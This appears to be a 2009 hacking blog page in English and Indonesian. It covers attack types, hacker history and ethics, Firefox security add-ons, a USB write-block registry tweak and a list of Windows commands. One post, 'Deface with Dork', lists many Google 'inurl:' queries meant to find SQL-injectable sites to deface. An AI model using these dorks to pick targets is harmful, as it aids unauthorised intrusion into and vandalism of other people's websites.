adsense camp

Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Wednesday, December 23, 2009

how to hackers attack the site and type of attack

Intrusion Detection Systems
An IDS's primary role is to ward off attacks by either terminating or resetting the sessions. Its secondary role is to record (log) events and incidents occurring in the network. There are two types of IDSs: host-based and network-based. A host-based IDS is specific to a host; and a network-based IDS is for the entire network.

IDSs ward off attacks or recognize attacks or intrusions through a database that has a list of attacks and intrusions to date. These are called attack signatures. An attack signature is defined as features of network traffic, either in the heading of a packet or in pattern of a group of packets, which distinguish it from legitimate traffic. For example, source and destination packets with similar IP addresses can be set as an attack signature. An IDS can detect all attacks that have the same source and destination IP addresses, based on attack signatures; ward off the traffic (not allow it to pass); and record the event with the requisite date stamps and other relevant information for future analysis. IDSs are configured with a set of attack signatures. If the pattern of the attack and that of the attack signature matches, then the IDS triggers an action that resets (terminates) the attacker's session.


Denial of Services (DoS)

A denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is an attempt to make a computer resource unavailable to its intended users. Although the means to carry out, motives for, and targets of a DoS attack may vary, it generally consists of the concerted efforts of a person or people to prevent an Internet site or service from functioning efficiently or at all, temporarily or indefinitely. Perpetrators of DoS attacks typically target sites or services hosted on high-profile web servers such as banks, credit card payment gateways, and even root nameservers.

One common method of attack involves saturating the target (victim) machine with external communications requests, such that it cannot respond to legitimate traffic, or responds so slowly as to be rendered effectively unavailable. In general terms, DoS attacks are implemented by either forcing the targeted computer(s) to reset, or consuming its resources so that it can no longer provide its intended service or obstructing the communication media between the intended users and the victim so that they can no longer communicate adequately.

Methods of attack
1 ICMP flood
2 Teardrop Attacks
3 Peer-to-peer attacks
4 Permanent denial-of-service attacks
5 Application level floods
6 Nuke
7 Distributed attack
8 Reflected attack
9 Degradation-of-service attacks
10 Unintentional denial of service
11 Denial-of-Service Level II
12 Blind denial of service


Joyrider
who is wearing just trying how to hacking.

Vandal
Type of attack damage specialist!? nothing else to explain..!!!

Scorekeeper
just wanted to show off, now attackers who use this methods often called WannaBe or Script kiddies.

Spy
to obtain data or confidential or secret information of the target machine, attack on the machines with the database application inside.
___________________________________________________________________
1. IP Spoofing
IP spoofing can also be a method of attack used by network intruders to defeat network security measures, such as authentication based on IP addresses. This method of attack on a remote system can be extremely difficult, as it involves modifying thousands of packets at a time. This type of attack is most effective where trust relationships exist between machines.

2. FTP Attack
is an exploit of the FTP protocol whereby an attacker is able to use the PORT command to request access to ports indirectly through the use of the victim machine as a middle man for the request. This technique can be used to port scan hosts discreetly, and to access specific ports that the attacker cannot access through a direct connection. nmap is a port scanner that can utilize an FTP bounce attack to scan other servers. Nowadays, nearly all FTP server programs are configured by default to refuse PORT commands that would connect to any host but the originating host, thwarting FTP bounce attacks.

3. Unix Finger Exploits
The information generated from this finger to minimize efforts to penetrate a cracker system. Personal information about the user finger raised by this daemon is enough for atacker to conduct a social engineering using social skillnya to utilizing user to 'tell' passwords and access codes to the system

4. Flooding & Broadcasting

5. Fragmented Packet Attacks

6. E-mail Exploits

7. DNS and BIND Vulnerabilities

8. Password Attacks

9. Proxy Server Attacks

10. Remote Command Processing Attacks

11. Remote File System Attack

12. Selective Program Insertions

13. Port Scanning

14. TCP/IP: Sequence Stealing, Passive Port Listening and Packet Interception

15. HTTPD Attacks
read more...

Lubang pada Flash

Adobe FlashSalah satu keunggulan para hacker adalah mereka dapat mendeteksi celah pada suatu aplikasi lebih awal. Termasuk tujuh celah berbahaya pada Flash Player yang ditemukan pada ajang hacking. Jika anda pecandu berat Internet dan menggunakan sistem operasi Windows, kemungkinan komputer Anda terdapat celah berbahaya akibat aplikasi Adobe Flash Player yang tidak di-update. Aplikasi Adobe Flash terbaru telah dirilis, memperbaiki tujuh celah yang dapat menjalankan kode .exe berbahaya di sistem Windows. Kode .exe berbahaya dapat dengan mudah dibuat oleh para hacker, kemudian menyebarkannya melalui Internet. Adobe telah memperbaiki aplikasi Flash Player dan menambal tujuh celah berbahaya yang biasanya digunakan untuk halaman web interaktif dan iklan online.

Adobe mengklasifikasi tambalan Flash Player sebagai “kritis” alias wajib di-upgrade dan menyarankan penggunaya untuk segera mengupdate ke versi terbaru. Salah satu celah pada Flash Player adalah yang dimanfaatkan oleh Shane Macaulay pada ajang PWN 2 OWN atau kontes hacking, dan membuat Shane berhasil memenangkan sebuah laptop.

Shane, memanfaatkan salah satu dari tujuh celah pada Flash untuk menjebol sistem keamanan pada sistem operasi Windows Vista. Memanfaatkan celah pada software Flash menjadi sangat popular akhir-akhir ini. Dan biasanya para hacker memanfaatkan Flash karena dua alasan, yakni kebanyakan browser Internet, termasuk Opera, Firefox, Safari, dan IE telah menggunakan aplikasi Flash Player dan iklan online yang berisi kode berbahaya dapat mengambil keuntungan dari celah yang terdapat di Flash Player.

sumber: Muhammad Haidar dari forum diskusi cyberc!Ty commun!Ty (almujtama' !.T sayid wa syarifah)
read more...

Sejarah Hacker dan Cracker

Sejarah Hacker dan Cracker

Hacker muncul pada awal tahun 1960-an diantara para anggota organisasi mahasiswa Tech Model Railroad Club di Laboratorium Kecerdasan Artifisial Massachusetts Institute of Technology (MIT). Kelompok mahasiswa tersebut merupakan salah satu perintis perkembangan teknologi komputer dan mereka beroperasi dengan sejumlah komputer mainframe. Kata hacker pertama kali muncul dengan arti positif untuk menyebut seorang anggota yang memiliki keahlian dalam bidang komputer dan mampu membuat program komputer yang lebih baik dari yang telah dirancang bersama. Kemudian pada tahun 1983, analogi hacker semakin berkembang untuk menyebut seseorang yang memiliki obsesi untuk memahami dan menguasai sistem komputer. Pasalnya, pada tahun tersebut untuk pertama kalinya FBI menangkap kelompok kriminal komputer The 414s yang berbasis di Milwaukee AS. 414 merupakan kode area lokal mereka. Kelompok yang kemudian disebut hacker tersebut dinyatakan bersalah atas pembobolan 60 buah komputer, dari komputer milik Pusat Kanker Memorial Sloan-Kettering hingga komputer milik Laboratorium Nasional Los Alamos. Salah seorang dari antara pelaku tersebut mendapatkan kekebalan karena testimonialnya, sedangkan 5 pelaku lainnya mendapatkan hukuman masa percobaan.

Kemudian pada perkembangan selanjutnya muncul kelompok lain yang menyebut-nyebut diri hacker, padahal bukan. Mereka ini (terutama para pria dewasa) yang mendapat kepuasan lewat membobol komputer dan mengakali telepon (phreaking). Hacker sejati menyebut orang-orang ini 'cracker' dan tidak suka bergaul dengan mereka. Hacker sejati memandang cracker sebagai orang malas, tidak
bertanggung jawab, dan tidak terlalu cerdas. Hacker sejati tidak setuju jika dikatakan bahwa dengan menerobos keamanan seseorang telah menjadi hacker.

Para hacker mengadakan pertemuan setiap setahun sekali yaitu diadakan setiap pertengahan bulan Juli di Las Vegas. Ajang pertemuan hacker terbesar di dunia tersebut dinamakan Def Con. Acara Def Con tersebut lebih kepada ajang pertukaran informasi dan teknologi yang berkaitan dengan aktivitas hacking.

Pengertian Hacker dan Cracker

1. Hacker
Hacker adalah sebutan untuk mereka yang memberikan sumbangan yang bermanfaat kepada jaringan komputer, membuat program kecil dan membagikannya dengan orang-orang di Internet. Sebagai contoh : digigumi (Grup Digital) adalah sebuah kelompok yang mengkhususkan diri bergerak dalam bidang game dan komputer. Digigumi ini menggunakan teknik teknik hexadecimal untuk mengubah teks yang terdapat di dalam game. Contohnya, game Chrono Trigger berbahasa Inggris dapat diubah menjadi bahasa Indonesia. Oleh karena itu, status Digigumi adalah hacker, namun bukan sebagai perusak. Hacker disini artinya, mencari, mempelajari dan mengubah sesuatu untuk keperluan hobi dan pengembangan dengan mengikuti legalitas yang telah ditentukan oleh developer game. Para hacker biasanya melakukan penyusupan-penyusupan dengan maksud memuaskan pengetahuan dan teknik. Rata - rata perusahaan yang bergerak di dunia jaringan global (internet) juga memiliki hacker. Tugasnya yaitu untuk menjaga jaringan dari kemungkinan perusakan pihak luar "cracker", menguji jaringan dari kemungkinan lobang yang menjadi peluang para cracker mengobrak - abrik jaringannya, sebagai contoh : perusahaan asuransi dan auditing "Price Waterhouse". Ia memiliki team hacker yang disebut dengan Tiger Team. Mereka bekerja untuk menguji sistem sekuriti client mereka.

2. Cracker

Cracker adalah sebutan untuk mereka yang masuk ke sistem orang lain dan cracker lebih bersifat destruktif, biasanya di jaringan komputer, mem-bypass password atau lisensi program komputer, secara sengaja melawan keamanan komputer, men-deface (merubah halaman muka web) milik orang lain bahkan hingga men-delete data orang lain, mencuri data dan umumnya melakukan cracking untuk keuntungan sendiri, maksud jahat, atau karena sebab lainnya karena ada tantangan. Beberapa proses pembobolan dilakukan untuk menunjukan kelemahan keamanan sistem.

Hirarki / Tingkatan Hacker

1. Elite

Ciri-ciri : mengerti sistem operasi luar dalam, sanggup mengkonfigurasi & menyambungkan jaringan secara global, melakukan pemrogramman setiap harinya, effisien & trampil, menggunakan pengetahuannya dengan tepat, tidak menghancurkan data-data, dan selalu mengikuti peraturan yang ada. Tingkat Elite ini sering disebut sebagai ‘suhu’.

2. Semi Elite

Ciri-ciri : lebih muda dari golongan elite, mempunyai kemampuan & pengetahuan luas tentang komputer, mengerti tentang sistem operasi (termasuk lubangnya), kemampuan programnya cukup untuk mengubah program eksploit.

3. Developed Kiddie

Ciri-ciri : umurnya masih muda (ABG) & masih sekolah, mereka membaca tentang metoda hacking & caranya di berbagai kesempatan, mencoba berbagai sistem sampai akhirnya berhasil & memproklamirkan kemenangan ke lainnya, umumnya masih menggunakan Grafik User Interface (GUI) & baru belajar basic dari UNIX tanpa mampu menemukan lubang kelemahan baru di sistem operasi.

4. Script Kiddie

Ciri-ciri : seperti developed kiddie dan juga seperti Lamers, mereka hanya mempunyai pengetahuan teknis networking yang sangat minimal, tidak lepas dari GUI, hacking dilakukan menggunakan trojan untuk menakuti & menyusahkan hidup sebagian pengguna Internet.

5. Lamer

Ciri-ciri : tidak mempunyai pengalaman & pengetahuan tapi ingin menjadi hacker sehingga lamer sering disebut sebagai ‘wanna-be’ hacker, penggunaan komputer mereka terutama untuk main game, IRC, tukar menukar software prirate, mencuri kartu kredit, melakukan hacking dengan menggunakan software trojan, nuke & DoS, suka menyombongkan diri melalui IRC channel, dan sebagainya. Karena banyak kekurangannya untuk mencapai elite, dalam perkembangannya mereka hanya akan sampai level developed kiddie atau script kiddie saja.
Cracker tidak mempunyai hirarki khusus karena sifatnya hanya membongkar dan merusak.

Kode Etik Hacker

1. Mampu mengakses komputer tak terbatas dan totalitas.

2. Semua informasi haruslah FREE.

3. Tidak percaya pada otoritas, artinya memperluas desentralisasi.

4. Tidak memakai identitas palsu, seperti nama samaran yang konyol, umur, posisi, dll.

5. Mampu membuat seni keindahan dalam komputer.

6. Komputer dapat mengubah hidup menjadi lebih baik.

7. Pekerjaan yang di lakukan semata-mata demi kebenaran informasi yang harus disebar luaskan.

8. Memegang teguh komitmen tidak membela dominasi ekonomi industri software tertentu.

9. Hacking adalah senjata mayoritas dalam perang melawan pelanggaran batas teknologi komputer.

10. Baik Hacking maupun Phreaking adalah satu-satunya jalan lain untuk menyebarkan informasi pada massa agar tak gagap dalam komputer.
Cracker tidak memiliki kode etik apapun.

Aturan Main Hacker

Gambaran umum aturan main yang perlu di ikuti seorang hacker seperti di jelaskan oleh Scorpio, yaitu:

· Di atas segalanya, hormati pengetahuan & kebebasan informasi.

· Memberitahukan sistem administrator akan adanya pelanggaran keamanan / lubang di keamanan yang anda lihat.

· Jangan mengambil keuntungan yang tidak fair dari hack.

· Tidak mendistribusikan & mengumpulkan software bajakan.

· Tidak pernah mengambil resiko yang bodoh – selalu mengetahui kemampuan sendiri.

· Selalu bersedia untuk secara terbuka / bebas / gratis memberitahukan & mengajarkan berbagai informasi & metoda yang diperoleh.

· Tidak pernah meng-hack sebuah sistem untuk mencuri uang.

· Tidak pernah memberikan akses ke seseorang yang akan membuat kerusakan.

· Tidak pernah secara sengaja menghapus & merusak file di komputer yang dihack.

· Hormati mesin yang di hack, dan memperlakukan dia seperti mesin sendiri.

Hacker sejati akan selalu bertindak berlandaskan kode etik dan aturan main sedang cracker tidak mempunyai kode etik ataupun aturan main karena cracker sifatnya merusak.

Perbedaan Hacker dan Cracker

a. Hacker

1.Mempunyai kemampuan menganalisa kelemahan suatu sistem atau situs. Sebagai contoh : jika seorang hacker mencoba menguji situs Yahoo! dipastikan isi situs tersebut tak akan berantakan dan mengganggu yang lain. Biasanya hacker melaporkan kejadian ini untuk diperbaiki menjadi sempurna.

2.Hacker mempunyai etika serta kreatif dalam merancang suatu program yang berguna bagi siapa saja.

3. Seorang Hacker tidak pelit membagi ilmunya kepada orang-orang yang serius atas nama ilmu pengetahuan dan kebaikan.

b. Cracker

1. Mampu membuat suatu program bagi kepentingan dirinya sendiri dan bersifat destruktif atau merusak dan menjadikannya suatu keuntungan. Sebagia contoh : Virus, Pencurian Kartu Kredit, Kode Warez, Pembobolan Rekening Bank, Pencurian Password E-mail/Web Server.

2. Bisa berdiri sendiri atau berkelompok dalam bertindak.

3. Mempunyai situs atau cenel dalam IRC yang tersembunyi, hanya orang-orang tertentu yang bisa mengaksesnya.

4. Mempunyai IP yang tidak bisa dilacak.

5. Kasus yang paling sering ialah Carding yaitu Pencurian Kartu Kredit, kemudian pembobolan situs dan mengubah segala isinya menjadi berantakan. Sebagai contoh : Yahoo! pernah mengalami kejadian seperti ini sehingga tidak bisa diakses dalam waktu yang lama, kasus clickBCA.com yang paling hangat dibicarakan tahun 2001 lalu.

Dua Jenis Kegiatan Hacking

1. Social Hacking, yang perlu diketahui : informasi tentang system apa yang dipergunakan oleh server, siapa pemilik server, siapa Admin yang mengelola server, koneksi yang dipergunakan jenis apa lalu bagaimana server itu tersambung internet, mempergunakan koneksi siapa lalu informasi apa saja yang disediakan oleh server tersebut, apakah server tersebut juga tersambung dengan LAN di sebuah organisasi dan informasi lainnya

2. Technical Hacking, merupakan tindakan teknis untuk melakukan penyusupan ke dalam system, baik dengan alat bantu (tool) atau dengan mempergunakan fasilitas system itu sendiri yang dipergunakan untuk menyerang kelemahan (lubang keamanan) yang terdapat dalam system atau service. Inti dari kegiatan ini adalah mendapatkan akses penuh kedalam system dengan cara apapun dan bagaimana pun.

Contoh Kasus Hacker

1. Pada tahun 1983, pertama kalinya FBI menangkap kelompok kriminal komputer The 414s(414 merupakan kode area lokal mereka) yang berbasis di Milwaukee AS. Kelompok yang kemudian disebut hacker tersebut melakukan pembobolan 60 buah komputer, dari komputer milik Pusat Kanker Memorial Sloan-Kettering hingga komputer milik Laboratorium Nasional Los Alamos. Salah seorang dari antara pelaku tersebut mendapatkan kekebalan karena testimonialnya, sedangkan 5 pelaku lainnya mendapatkan hukuman masa percobaan.

2. Digigumi (Grup Digital) adalah sebuah kelompok yang mengkhususkan diri bergerak dalam bidang game dan komputer dengan menggunakan teknik teknik hexadecimal untuk mengubah teks yang terdapat di dalam game. Contohnya : game Chrono Trigger berbahasa Inggris dapat diubah menjadi bahasa Indonesia. Oleh karena itu, status Digigumi adalah hacker, namun bukan sebagai perusak.

3. Pada hari Sabtu, 17 April 2004, Dani Firmansyah, konsultan Teknologi Informasi (TI) PT Danareksa di Jakarta berhasil membobol situs milik Komisi Pemilihan Umum (KPU) di http://tnp.kpu.go.id dan mengubah nama-nama partai di dalamnya menjadi nama-nama "unik", seperti Partai Kolor Ijo, Partai Mbah Jambon, Partai Jambu, dan lain sebagainya. Dani menggunakan teknik SQL Injection(pada dasarnya teknik tersebut adalah dengan cara mengetikkan string atau perintah tertentu di address bar browser) untuk menjebol situs KPU. Kemudian Dani tertangkap pada hari Kamis, 22 April 2004.

Akibat yang Ditimbulakan oleh Hacker dan Cracker

Hacker : membuat teknologi internet semakin maju karena hacker menggunakan keahliannya dalam hal komputer untuk melihat, menemukan dan memperbaiki kelemahan sistem keamanan dalam sebuah sistem komputer ataupun dalam sebuah software, membuat gairah bekerja seorang administrator kembali hidup karena hacker membantu administrator untuk memperkuat jaringan mereka.

Cracker : merusak dan melumpuhkan keseluruhan sistem komputer, sehingga data-data pengguna jaringan rusak, hilang, ataupun berubah.
__________________________________________________________________

Para hacker menggunakan keahliannya dalam hal komputer untuk melihat, menemukan dan memperbaiki kelemahan sistem keamanan dalam sebuah sistem komputer ataupun dalam sebuah software. Oleh karena itu, berkat para hacker-lah Internet ada dan dapat kita nikmati seperti sekarang ini, bahkan terus di perbaiki untuk menjadi sistem yang lebih baik lagi. Maka hacker dapat disebut sebagai pahlawan jaringan sedang cracker dapat disebut sebagai penjahat jaringan karena melakukan melakukan penyusupan dengan maksud menguntungkan dirinya secara personallity dengan maksud merugikan orang lain. Hacker sering disebut hacker putih (yang merupakan hacker sejati yang sifatnya membangun) dan hacker hitam (cracker yang sifatnya membongkar dan merusak)

Sumber: Muhammad Anshari, dari form diskusi HACKER NEW AVOLUTION
read more...

Sunday, December 20, 2009

Mozilla Hacking


Advanced Dork: https://addons.mozilla.org/en-US/firefox/addon/2144

Cipherfox: https://addons.mozilla.org/en-US/firefox/addon/8919

Console: https://addons.mozilla.org/en-US/firefox/addon/1815

Copycode: https://addons.mozilla.org/en-US/firefox/addon/9507

Domain Lookup: https://addons.mozilla.org/en-US/firefox/addon/7095

Edit Page: https://addons.mozilla.org/en-US/firefox/addon/8289

Event Spy: https://addons.mozilla.org/en-US/firefox/addon/1100

Execute Javascript: https://addons.mozilla.org/en-US/firefox/addon/1729

Fire Encrypter: https://addons.mozilla.org/en-US/firefox/addon/3208

Firebug: https://addons.mozilla.org/firefox/addon/1843

Firephorm: https://addons.mozilla.org/en-US/firefox/addon/7536

FirePHP: https://addons.mozilla.org/en-US/firefox/addon/6149

Firerainbow: https://addons.mozilla.org/en-US/firefox/addon/9603

FireSymfony: https://addons.mozilla.org/en-US/firefox/addon/9096

GreaseMonkey: https://addons.mozilla.org/en-US/firefox/addon/748

Greasefire: https://addons.mozilla.org/en-US/firefox/addon/8352

Better LifeHacker: https://addons.mozilla.org/en-US/firefox/addon/8011

HackBar: https://addons.mozilla.org/en-US/firefox/addon/3899

Html Editor: https://addons.mozilla.org/en-US/firefox/addon/9034

Inline Code Finder For FireBug: https://addons.mozilla.org/en-US/firefox/addon/9641

Javascript Debugger: https://addons.mozilla.org/en-US/firefox/addon/216

Jsview: https://addons.mozilla.org/en-US/firefox/addon/2076

Live Http Headers: https://addons.mozilla.org/en-US/firefox/addon/3829

Mass Password Reset: https://addons.mozilla.org/en-US/firefox/addon/9652

Noscript: https://addons.mozilla.org/en-US/firefox/addon/722

Obtrusive Javascript Checker: https://addons.mozilla.org/en-US/firefox/addon/9505

Page Hacker: https://addons.mozilla.org/en-US/firefox/addon/5753

Password Hasher: https://addons.mozilla.org/en-US/firefox/addon/3282

Rainbow For Firebug: https://addons.mozilla.org/en-US/firefox/addon/7575

Sql Inject Me: https://addons.mozilla.org/en-US/firefox/addon/7597

Sql Injection: https://addons.mozilla.org/en-US/firefox/addon/6727

Switchproxy: https://addons.mozilla.org/en-US/firefox/addon/125

Tamper Data: https://addons.mozilla.org/en-US/firefox/addon/966

Tinyurl Creator: https://addons.mozilla.org/en-US/firefox/addon/126

Xss Me: https://addons.mozilla.org/en-US/firefox/addon/7598

NoXSS: https://addons.mozilla.org/en-US/firefox/addon/9136

read more...

Deface with Dork

Setelah menulis posting saya tentang Deface Website with darkmysqli.py yang lalu, tentunya kita juga membutuhkan dork-dork yang bisa kita pergunakan untuk mencari target. Oke langsung saja ya:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
read more...

Wednesday, December 16, 2009

secure computer from data theft

stop copy files from computer to USB Flashdisk



















1. Open you Regedit (RUN > regedit > enter)

2. find and in to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\


3. add new key rename this folder as “StorageDevicePolicies”


4. and then right click that folder select new----> Dword


5. Rename as “WriteProtect”


6. double click on DWORD data, and change that value no 1


7. Close REGEDIT.


8. Restart Your PC



To restore just change that value data into 0.

read more...

Monday, December 14, 2009

command in the Command Prompt from A to Z


A
ADDUSERS ==>> Add or list users to/from a CSV file
ARP ==>> Address Resolution Protocol
ASSOC ==>> Change file extension associations•
ASSOCIAT ==>> One step file association
AT ==>> Schedule a command to run at a later time
ATTRIB ==>> Change file attributes

B
BOOTCFG ==>> Edit Windows boot settings
BROWSTAT ==>> Get domain, browser and PDC info

C
CACLS ==>> Change file permissions
CALL ==>> Call one batch program from another•
CD ==>> Change Directory - move to a specific Folder•
CHANGE ==>> Change Terminal Server Session properties
CHKDSK ==>> Check Disk - check and repair disk problems
CHKNTFS ==>> Check the NTFS file system
CHOICE ==>> Accept keyboard input to a batch file
CIPHER ==>> Encrypt or Decrypt files/folders
CleanMgr ==>> Automated cleanup of Temp files, recycle bin
CLEARMEM ==>> Clear memory leaks
CLIP ==>> Copy STDIN to the Windows clipboard.
CLS ==>> Clear the screen•
CLUSTER ==>> Windows Clustering
CMD ==>> Start a new CMD shell
COLOR ==>> Change colors of the CMD window•
COMP ==>> Compare the contents of two files or sets of files
COMPACT ==>> Compress files or folders on an NTFS partition
COMPRESS ==>> Compress individual files on an NTFS partition
CON2PRT ==>> Connect or disconnect a Printer
CONVERT ==>> Convert a FAT drive to NTFS.
COPY ==>> Copy one or more files to another location•
CSCcmd ==>> Client-side caching (Offline Files)
CSVDE ==>> Import or Export Active Directory data

D
DATE ==>> Display or set the date•
Dcomcnfg ==>> DCOM Configuration Utility
DEFRAG ==>> Defragment hard drive
DEL ==>> Delete one or more files•
DELPROF ==>> Delete NT user profiles
DELTREE ==>> Delete a folder and all subfolders
DevCon ==>> Device Manager Command Line Utility
DIR ==>> Display a list of files and folders•
DIRUSE ==>> Display disk usage
DISKCOMP ==>> Compare the contents of two floppy disks
DISKCOPY ==>> Copy the contents of one floppy disk to another
DISKPART ==>> Disk Administration
DNSSTAT ==>> DNS Statistics
DOSKEY ==>> Edit command line, recall commands, and create macros
DSADD ==>> Add user (computer, group..) to active directory
DSQUERY ==>> List items in active directory
DSMOD ==>> Modify user (computer, group..) in active directory

E
ECHO ==>> Display message on screen•
ENDLOCAL ==>> End localisation of environment changes in a batch file•
ERASE ==>> Delete one or more files•
EXIT ==>> Quit the current script/routine and set an errorlevel•
EXPAND ==>> Uncompress files
EXTRACT ==>> Uncompress CAB files

F
FC ==>> Compare two files
FIND ==>> Search for a text string in a file
FINDSTR ==>> Search for strings in files
FOR /F ==>> Loop command: against a set of files•
FOR /F ==>> Loop command: against the results of another command•
FOR ==>> Loop command: all options Files, Directory, List•
FORFILES ==>> Batch process multiple files
FORMAT ==>> Format a disk
FREEDISK ==>> Check free disk space (in bytes)
FSUTIL ==>> File and Volume utilities
FTP ==>> File Transfer Protocol
FTYPE ==>> Display or modify file types used in file extension associations•

G
GLOBAL ==>> Display membership of global groups
GOTO ==>> Direct a batch program to jump to a labelled line•

H
HELP ==>> Online Help

I
iCACLS ==>> Change file and folder permissions
IF ==>> Conditionally perform a command•
IFMEMBER ==>> Is the current user in an NT Workgroup
IPCONFIG ==>> Configure IP

K
KILL ==>> Remove a program from memory

L
LABEL ==>> Edit a disk label
LOCAL ==>> Display membership of local groups
LOGEVENT ==>> Write text to the NT event viewer.
LOGOFF ==>> Log a user off
LOGTIME ==>> Log the date and time in a file

M
MAPISEND ==>> Send email from the command line
MBSAcli ==>> Baseline Security Analyzer.
MEM ==>> Display memory usage
MD ==>> Create new folders•
MKLINK ==>> Create a symbolic link (linkd)
MODE ==>> Configure a system device
MORE ==>> Display output, one screen at a time
MOUNTVOL ==>> Manage a volume mount point
MOVE ==>> Move files from one folder to another•
MOVEUSER ==>> Move a user from one domain to another
MSG ==>> Send a message
MSIEXEC ==>> Microsoft Windows Installer
MSINFO ==>> Windows NT diagnostics
MSTSC ==>> Terminal Server Connection (Remote Desktop Protocol)
MUNGE ==>> Find and Replace text within file(s)
MV ==>> Copy in-use files

N
NET ==>> Manage network resources
NETDOM ==>> Domain Manager
NETSH ==>> Configure network protocols
NETSVC ==>> Command-line Service Controller
NBTSTAT ==>> Display networking statistics (NetBIOS over TCP/IP)
NETSTAT ==>> Display networking statistics (TCP/IP)
NOW ==>> Display the current Date and Time
NSLOOKUP ==>> Name server lookup
NTBACKUP ==>> Backup folders to tape
NTRIGHTS ==>> Edit user account rights

P
PATH ==>> Display or set a search path for executable files•
PATHPING ==>> Trace route plus network latency and packet loss
PAUSE ==>> Suspend processing of a batch file and display a message•
PERMS ==>> Show permissions for a user
PERFMON ==>> Performance Monitor
PING ==>> Test a network connection
POPD ==>> Restore the previous value of the current directory saved by PUSHD•
PORTQRY ==>> Display the status of ports and services
PRINT ==>> Print a text file
PRNCNFG ==>> Display, configure or rename a printer
PRNMNGR ==>> Add, delete, list printers set the default printer
PROMPT ==>> Change the command prompt•
PsExec ==>> Execute process remotely
PsFile ==>> Show files opened remotely
PsGetSid ==>> Display the SID of a computer or a user
PsInfo ==>> List information about a system
PsKill ==>> Kill processes by name or process ID
PsList ==>> List detailed information about processes
PsLoggedOn ==>> Who's logged on (locally or via resource sharing)
PsLogList ==>> Event log records
PsPasswd ==>> Change account password
PsService ==>> View and control services
PsShutdown ==>> Shutdown or reboot a computer
PsSuspend ==>> Suspend processes
PUSHD ==>> Save and then change the current directory•

Q
QGREP ==>> Search file(s) for lines that match a given pattern.

R
RASDIAL ==>> Manage RAS connections
RASPHONE ==>> Manage RAS connections
RECOVER ==>> Recover a damaged file from a defective disk.
REG ==>> Registry: Read, Set, Export, Delete keys and values
REGEDIT ==>> Import or export registry settings
REGSVR32 ==>> Register or unregister a DLL
REGINI ==>> Change Registry Permissions
REM ==>> Record comments (remarks) in a batch file•
REN ==>> Rename a file or files•
REPLACE ==>> Replace or update one file with another
RD ==>> Delete folder(s)•
RMTSHARE ==>> Share a folder or a printer
ROBOCOPY ==>> Robust File and Folder Copy
ROUTE ==>> Manipulate network routing tables
RUNAS ==>> Execute a program under a different user account
RUNDLL32 ==>> Run a DLL command (add/remove print connections)

S
SC ==>> Service Control
SCHTASKS ==>> Create or Edit Scheduled Tasks
SCLIST ==>> Display NT Services
SET ==>> Display, set, or remove environment variables•
SETLOCAL ==>> Control the visibility of environment variables•
